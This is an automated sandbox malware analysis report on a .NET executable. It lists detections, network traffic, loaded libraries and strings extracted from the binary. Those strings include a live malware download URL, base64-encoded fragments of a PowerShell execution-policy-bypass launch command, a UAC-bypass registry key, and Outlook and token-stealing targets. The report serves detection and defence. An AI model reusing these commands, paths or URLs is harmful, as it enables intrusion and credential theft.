Edit tour

Windows Analysis Report
iGxCM2I5u9.exe

Overview

General Information

Sample name:	iGxCM2I5u9.exe renamed because original name is a hash value
Original sample name:	2960e7ad1d18bf517b5b4edf6e674e5ffdc587a8672cac0b24907a8fae8de59c.exe
Analysis ID:	1569093
MD5:	8c6fb38b219a123b9340465b8d2dd5f8
SHA1:	35242280f551684b9e47726d5f94f1615c0dc76e
SHA256:	2960e7ad1d18bf517b5b4edf6e674e5ffdc587a8672cac0b24907a8fae8de59c
Tags:	exeuser-adrian__luca
Infos:

Detection

Score:	72
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Multi AV Scanner detection for submitted file

AI detected suspicious sample

Machine Learning detection for sample

Queries memory information (via WMI often done to detect virtual machines)

Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Detected potential crypto function

Enables debug privileges

HTTP GET or POST without a user agent

JA3 SSL client fingerprint seen in connection with other malware

One or more processes crash

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Classification

Process Tree

System is w10x64

iGxCM2I5u9.exe (PID: 6420 cmdline: "C:\Users\user\Desktop\iGxCM2I5u9.exe" MD5: 8C6FB38B219A123B9340465B8D2DD5F8)

WerFault.exe (PID: 5684 cmdline: C:\Windows\system32\WerFault.exe -u -p 6420 -s 2096 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

cleanup

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://orange-loris-425181.hostingersite.com/uploads/clean.exe

Avira URL Cloud: Label: malware

Multi AV Scanner detection for submitted file

Source: iGxCM2I5u9.exe

ReversingLabs: Detection: 65%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.5% probability

Machine Learning detection for sample

Source: iGxCM2I5u9.exe

Joe Sandbox ML: detected

Source: unknown

HTTPS traffic detected: 84.32.84.122:443 -> 192.168.2.5:49704 version: TLS 1.2

Source: iGxCM2I5u9.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: System.Xml.ni.pdb source: WER9DAB.tmp.dmp.4.dr
Source:	Binary string: mscorlib.pdb source: WER9DAB.tmp.dmp.4.dr
Source:	Binary string: System.ni.pdbRSDS source: WER9DAB.tmp.dmp.4.dr
Source:	Binary string: System.Management.ni.pdbRSDSJ< source: WER9DAB.tmp.dmp.4.dr
Source:	Binary string: System.Drawing.pdb source: WER9DAB.tmp.dmp.4.dr
Source:	Binary string: System.Management.pdb source: WER9DAB.tmp.dmp.4.dr
Source:	Binary string: mscorlib.ni.pdb source: WER9DAB.tmp.dmp.4.dr
Source:	Binary string: System.Management.ni.pdb source: WER9DAB.tmp.dmp.4.dr
Source:	Binary string: System.Drawing.ni.pdb source: WER9DAB.tmp.dmp.4.dr
Source:	Binary string: System.Core.pdb source: WER9DAB.tmp.dmp.4.dr
Source:	Binary string: System.Configuration.ni.pdb source: WER9DAB.tmp.dmp.4.dr
Source:	Binary string: mscorlib.ni.pdbRSDS7^3l source: WER9DAB.tmp.dmp.4.dr
Source:	Binary string: System.Configuration.pdb source: WER9DAB.tmp.dmp.4.dr
Source:	Binary string: System.Drawing.ni.pdbRSDS source: WER9DAB.tmp.dmp.4.dr
Source:	Binary string: System.Configuration.ni.pdbRSDScUN source: WER9DAB.tmp.dmp.4.dr
Source:	Binary string: System.Xml.pdb source: WER9DAB.tmp.dmp.4.dr
Source:	Binary string: System.ni.pdb source: WER9DAB.tmp.dmp.4.dr
Source:	Binary string: System.pdb source: WER9DAB.tmp.dmp.4.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WER9DAB.tmp.dmp.4.dr
Source:	Binary string: System.Xml.ni.pdbRSDS# source: WER9DAB.tmp.dmp.4.dr
Source:	Binary string: System.Core.ni.pdb source: WER9DAB.tmp.dmp.4.dr

Source: global traffic

HTTP traffic detected: GET /uploads/clean.exe HTTP/1.1Host: orange-loris-425181.hostingersite.comConnection: Keep-Alive

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /uploads/clean.exe HTTP/1.1Host: orange-loris-425181.hostingersite.comConnection: Keep-Alive

Source: global traffic

DNS traffic detected: DNS query: orange-loris-425181.hostingersite.com

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Dec 2024 12:04:59 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-Encodinglast-modified: Wed, 11 Jan 2023 12:29:40 GMTetag: W/"999-63beabb4-5b41a25ab194c3b4;gz"platform: hostingerpanel: hpanelx-turbo-charged-by: LiteSpeedServer: hcdnx-hcdn-request-id: 141d270770133aca7f524af2d72e23ad-bos-edge1

Source: iGxCM2I5u9.exe, 00000000.00000002.2314680258.000001EC7ECA1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.m
Source: iGxCM2I5u9.exe, 00000000.00000002.2312956364.000001EC000AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://free.cdn.hstgr.net
Source: iGxCM2I5u9.exe, 00000000.00000002.2312956364.000001EC000AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://orange-loris-425181.hostingersite.com
Source: iGxCM2I5u9.exe, 00000000.00000002.2312956364.000001EC00098000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Amcache.hve.4.dr	String found in binary or memory: http://upx.sf.net
Source: iGxCM2I5u9.exe, 00000000.00000002.2312956364.000001EC000D4000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.2312956364.000001EC000CF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://fonts.googleapis.com/css?family=Open
Source: iGxCM2I5u9.exe, 00000000.00000002.2312956364.000001EC000D4000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.2312956364.000001EC000CF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css
Source: iGxCM2I5u9.exe, 00000000.00000002.2312956364.000001EC000A8000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.2312956364.000001EC00098000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://orange-loris-425181.hostingersite.com
Source: iGxCM2I5u9.exe, 00000000.00000002.2312956364.000001EC00001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://orange-loris-425181.hostingersite.com/uploads/clean.exe
Source: iGxCM2I5u9.exe, 00000000.00000002.2312956364.000001EC00001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://orange-loris-425181.hostingersite.com/uploads/clean.exepV
Source: iGxCM2I5u9.exe, 00000000.00000002.2312956364.000001EC000D4000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.2312956364.000001EC000CF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com/analytics.js

Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704

Source: unknown

HTTPS traffic detected: 84.32.84.122:443 -> 192.168.2.5:49704 version: TLS 1.2

Source: C:\Users\user\Desktop\iGxCM2I5u9.exe	Code function: 0_2_00007FF848F4C0C2		0_2_00007FF848F4C0C2
Source: C:\Users\user\Desktop\iGxCM2I5u9.exe	Code function: 0_2_00007FF848F4B316		0_2_00007FF848F4B316

Source: C:\Users\user\Desktop\iGxCM2I5u9.exe

Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6420 -s 2096

Source: iGxCM2I5u9.exe, 00000000.00000000.2021133840.000001EC7CE92000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameSystem.exe" vs iGxCM2I5u9.exe
Source: iGxCM2I5u9.exe	Binary or memory string: OriginalFilenameSystem.exe" vs iGxCM2I5u9.exe

Source: iGxCM2I5u9.exe, AcohdgxumZqMtqiEyujcnGKSk.cs

Base64 encoded string: 'L2Mgc3RhcnQgL2IgcG93ZXJzaGVsbCDigJNFeGVjdXRpb25Qb2xpY3kgQnlwYXNzIFN0YXJ0LVByb2Nlc3MgLUZpbGVQYXRoICci', 'U29mdHdhcmVcQ2xhc3Nlc1xtcy1zZXR0aW5nc1xTaGVsbFxPcGVuXGNvbW1hbmQ=', 'QUNnYktLOG8veWpmS084b1Z5ajJLRElvUVNpQUtFQW9KQ2dzS0E4b0pTZ2tLQUFvUUNocEtKSW96aWk5S1A4byt5Z3ZLQjRvQVNnZ0FBPT0=', 'QUNnQUtBQW9BQ2lKS0Iwb0V5aTdLT1FvZUNnaktFQW9BQ2dBS0FBb0FDZ0FLQ0FvR2lqMEtING9YeWdKS0NNb1FDZ0FLQUFvQUNnZ0FBPT0=', 'QUNnQUtBQW80Q2p6S01Zb0ZDZ0pLQThvL3loRUtMRW81Q2lFS01Bb3BDajBLRWNvOENoZktLa29BU2dnS0hRb2Z5aEVLQUFvQUNnZ0FBPT0=', 'QUNnQUtLQW9BU2lBS0E0b0FDZ0FLQmdvL0NoL0tEc29HU2pOS01Bb1BDZzVLRjhvL3lqRUtNTW9BQ2dBS0Jnb1JDZ0lLRVFvQUNnZ0FBPT0=', 'QUNnQUtBY29nQ2pzS1BZbzdDaHJLSXNvZkNpM0tGY29nQ2lYS0Frb0p5aEFLTW9vdUNqbktORW85Q2p0S1BRbzlDaEVLRGdvQUNnZ0FBPT0=', 'QUNpNEtBQW9DQ2dKS0Jzb055aitLUDhveHlqdktPY295eWlKS0gwb0RTaVpLUDBvemlqL0tQOG9KeWdmS0Fzb0FTaEdLQUFvUkNnZ0FBPT0=', 'QUNpNEtJQW9RQ2dBS0lBb1lDZ1lLSWtvZnlqL0tQOG8veWhXS0FFb3NDai9LUDhvL3lqL0tFZ29FU2dpS01Bb0FDam5LRUFvUnlnZ0FBPT0=', 'QUNnWUtFNG9EeWdXS0JNb0VpZ1NLRG9vL3loSUtMY29neWdCS0FBb0RpZzhLSDRveVNqL0tBY29BQ2dBS0Fnb2dTZ0pLS3NvQUNnZ0FBPT0=', 'QUNnQUtLRW9BQ2dRS0VBb0FDZ0FLQUFvT1NqL0tPNG9JaWhIS0FBb3VDZ1FLUFVvdnlnTEtBQW9BQ2dBS0FBb0JpZ0FLRXdvQUNnZ0FBPT0=', 'QUNnQUtBQW9veWdBS0Fnb2hDZ0FLQUFvQUNnSUtCa29SeWhHS0JBb3VDaTRLQXNvQVNnQUtBQW9BQ2dBS0Fvb0FDaGNLQUFvQUNnZ0FBPT0=', 'QUNnQUtBQW9BQ2dSS01Rb0FDZ1JLSVFvUUNnQUtBQW8veWptS09RbzlDaitLQUFvQUNnQUtFQW9FQ2dCS09Bb0NpZ0FLQUFvQUNnZ0FBPT0=', 'QUNnQUtBQW9BQ2dBS0Fnb0VpaWtLSDhvQ0NnUUtBQW9OQ2l0S1A4bzdTZ3VLQUFvRWlncEtQNG9aQ2dhS0FFb0FDZ0FLQUFvQUNnZ0FBPT0=', 'QUNnQUtBQW9BQ2dBS0FBb0FDZ0FLQWdvRUNnQUtDUW9BQ2lJS1BZb1dDZ0FLQ1FvRkNnQ0tBRW9BQ2dBS0FBb0FDZ0FLQUFvQUNnZ0FBPT0=', 'QUNnQUtBQW9BQ2dBS0FBb0FDZ0FLQUFvQUNnQUtBQW9BQ2dBS0Jrb0FDZ0FLQUFvQUNnQUtBQW9BQ2dBS0FBb0FDZ0FLQUFvQUNnZ0FDQUE=', 'Q1FBSkFEM1lzOXdnQUVNQWNnQmxBR1FBYVFCMEFFTUFZUUJ5QUdRQWN3QTZBQ0FB', 'Q1FBSkFEM1lGdDBnQUVJQWJ3QnZBR3NBYlFCaEFISUFhd0J6QURvQUlBQT0=', 'Q1FBSkFEM1k1dHdnQUVRQWJ3QjNBRzRBYkFCdkFHRUFaQUJ6QURvQUlBQT0=', 'Q1FBSkFEellxTjhnQUZJQVpRQnpBSFFBYndCeUFHVUFWQUJ2QUdzQVpRQnVBSE1BT2dBZ0FBPT0=', 'Q1FBSkFEN1l5dDBnQUZjQVlRQnNBR3dBWlFCMEFITUFPZ0FnQUE9PQ==', 'Q1FCRUp3LytJQUJYQUdFQWJBQnNBR1VBZEFCekFDQUFRUUJ3QUhBQU9nQWdBQT09', 'Q1FBKzJLTGRJQUJRQUdrQVpBQm5BR2tBYmdBZ0FFRUFjQUJ3QURvQUlBQT0=', 'Q1FBOTJIN2NJQUJFQUdrQWN3QmpBRzhBY2dCa0FDQUFWQUJ2QUdzQVpRQnVBSE1BT2dBZ0FBPT0=', 'Q1FBSUp3LytJQUJVQUdVQWJBQmxBR2NBY2dCaEFHMEFJQUJ6QUdVQWN3QnpBR2tBYndCdUFITUE=', 'Q1FBQkpnLytJQUJUQUdzQWVRQndBR1VBSUFCekFHVUFjd0J6QUdrQWJ3QnVBQT09', 'Q1FBOTJIN2NJQUJFQUdrQWN3QmpBRzhBY2dCa0FDQUFkQUJ2QUdzQVpRQnVBQT09', 'Q1FBOTJLM2NJQUJUQUdrQVp3QnVBR0VBYkFBZ0FITUFaUUJ6QUhNQWFRQnZBRzRB', 'Q1FBODJLN2ZJQUJUQUhRQVpRQmhBRzBBSUFCekFHVUFjd0J6QUdrQWJ3QnVBQT09', 'Q1FBODJLN2ZJQUJWQUhBQWJBQmhBSGtBSUFCekFHVUFjd0J6QUdrQWJ3QnVBQT09', 'Q1FDWkpnLytJQUJRQUhJQWJ3QmpBR1VBY3dCekFHVUFjd0E2QUNBQQ==', 'W1x3LV17MjQsMjZ9XC5bXHctXXs2fVwuW1x3LV17MjUsMTEwfXxtZmFcLlthLXpBLVowLTlfXC1dezg0fQ==', 'U29mdHdhcmVcTWljcm9zb2Z0XE9mZmljZVwxNS4wXE91dGxvb2tcUHJvZmlsZXNcT3V0bG9va1w5Mzc1Q0ZGMDQxMzExMWQzQjg4QTAwMTA0QjJBNjY3Ng==', 'U29mdHdhcmVcTWljcm9

Source: classification engine

Classification label: mal72.evad.winEXE@2/5@1/1

Source: C:\Users\user\Desktop\iGxCM2I5u9.exe	Mutant created: NULL
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6420

Source: C:\Users\user\Desktop\iGxCM2I5u9.exe

File created: C:\Users\user\AppData\Local\Temp\downloadedFile.exe

Jump to behavior

Source: iGxCM2I5u9.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: iGxCM2I5u9.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.79%

Source: C:\Users\user\Desktop\iGxCM2I5u9.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: iGxCM2I5u9.exe

ReversingLabs: Detection: 65%

Source: unknown	Process created: C:\Users\user\Desktop\iGxCM2I5u9.exe "C:\Users\user\Desktop\iGxCM2I5u9.exe"
Source: C:\Users\user\Desktop\iGxCM2I5u9.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6420 -s 2096

Source: C:\Users\user\Desktop\iGxCM2I5u9.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exe	Section loaded: userenv.dll	Jump to behavior

Source: C:\Users\user\Desktop\iGxCM2I5u9.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\iGxCM2I5u9.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: iGxCM2I5u9.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: iGxCM2I5u9.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: System.Xml.ni.pdb source: WER9DAB.tmp.dmp.4.dr
Source:	Binary string: mscorlib.pdb source: WER9DAB.tmp.dmp.4.dr
Source:	Binary string: System.ni.pdbRSDS source: WER9DAB.tmp.dmp.4.dr
Source:	Binary string: System.Management.ni.pdbRSDSJ< source: WER9DAB.tmp.dmp.4.dr
Source:	Binary string: System.Drawing.pdb source: WER9DAB.tmp.dmp.4.dr
Source:	Binary string: System.Management.pdb source: WER9DAB.tmp.dmp.4.dr
Source:	Binary string: mscorlib.ni.pdb source: WER9DAB.tmp.dmp.4.dr
Source:	Binary string: System.Management.ni.pdb source: WER9DAB.tmp.dmp.4.dr
Source:	Binary string: System.Drawing.ni.pdb source: WER9DAB.tmp.dmp.4.dr
Source:	Binary string: System.Core.pdb source: WER9DAB.tmp.dmp.4.dr
Source:	Binary string: System.Configuration.ni.pdb source: WER9DAB.tmp.dmp.4.dr
Source:	Binary string: mscorlib.ni.pdbRSDS7^3l source: WER9DAB.tmp.dmp.4.dr
Source:	Binary string: System.Configuration.pdb source: WER9DAB.tmp.dmp.4.dr
Source:	Binary string: System.Drawing.ni.pdbRSDS source: WER9DAB.tmp.dmp.4.dr
Source:	Binary string: System.Configuration.ni.pdbRSDScUN source: WER9DAB.tmp.dmp.4.dr
Source:	Binary string: System.Xml.pdb source: WER9DAB.tmp.dmp.4.dr
Source:	Binary string: System.ni.pdb source: WER9DAB.tmp.dmp.4.dr
Source:	Binary string: System.pdb source: WER9DAB.tmp.dmp.4.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WER9DAB.tmp.dmp.4.dr
Source:	Binary string: System.Xml.ni.pdbRSDS# source: WER9DAB.tmp.dmp.4.dr
Source:	Binary string: System.Core.ni.pdb source: WER9DAB.tmp.dmp.4.dr

Source: iGxCM2I5u9.exe

Static PE information: 0x9A13B17D [Thu Nov 30 18:31:25 2051 UTC]

Source: iGxCM2I5u9.exe, YNQggCGIprkgfKSFO.cs	High entropy of concatenated method names: 'yaQsiQjOIaNVMcbsUYNIYqAma', 'jfoqIjiIQWJffAwStf', 'UfHEmpurGaIZdSGgDaSRemDM', 'josMLGwUrGx', 'aBAOrciIwfNZTtrbOQ', 'bvzDBBfvTLEmMJFcZRDm', 'UDIDbTtRPVGbY', 'fbyzMMhOwstBQOQS', 'KdXGrrzaildEq', 'LnnZBaSqadFHQKZCeBxLwxAOn'
Source: iGxCM2I5u9.exe, AcohdgxumZqMtqiEyujcnGKSk.cs	High entropy of concatenated method names: 'vAoWMpNCmxjb', 'iqybDWaoMVQZhh', 'KuSWxWkxGQMByqEkVWfAmp', 'HwJSjeXwfHarseNesyt', 'KqVcyIkvCBhBVPLaoEASjTh', 'YzMGIsmBswUQbhUbubtdaYVc', 'mpoxbJrJbDywenK', 'fJZvuzHjZYHZDS', 'djnVCyEQncHzdVfPojOvPwhYn', 'EYDBSGIEVMrRHQbslSnz'
Source: iGxCM2I5u9.exe, eUZcfxaGLVMSHSrJHtKYI.cs	High entropy of concatenated method names: 'SBohrrBlujVWUCRUM', 'PsypwigwOSQgzEKjUU', 'XuiosVQmdMlQIDiMyYdFFAuc', 'UOjQLkhwaoghDGTfvCkd', 'IcRsMLrPoW', 'GEXHgWRcDUhOBfuSJZKyKyhMl', 'YzZqgmShbyiMzZk', 'ahaNQNSshpeY', 'HXLVPxSCMnvwTEvkxakNCX', 'lXALggIrHu'

Source: C:\Users\user\Desktop\iGxCM2I5u9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iGxCM2I5u9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
